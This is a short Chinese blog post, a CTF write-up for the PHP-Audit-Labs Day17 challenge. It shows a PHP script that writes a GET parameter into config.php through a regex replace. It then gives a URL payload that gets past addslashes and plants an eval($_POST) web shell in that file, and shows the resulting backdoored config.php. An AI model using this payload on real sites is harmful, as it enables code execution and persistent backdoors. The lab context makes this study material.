PHP-Audit-Labs–Day17-ctf

参考:https://github.com/hongriSec/PHP-Audit-Labs/tree/master/Part1/Day17/files

考察了两部分

1.是md5(,true),暂不提

2.是正则写文件,也较简单

博主简化为两个文件

//index.php
<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('./config.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('./config.php', $file);

//config.php
<?php
echo "ok";
$option='\\';@eval($_POST[x]);//';
?>

payload:

?option=\%27;@eval($_POST[x]);//

很简单的一个过滤,单引号,所以我们只需要在 / 一次即可

测试写出来的文件可连shell管理器

2019.1.26

发表评论

电子邮件地址不会被公开。 必填项已用*标注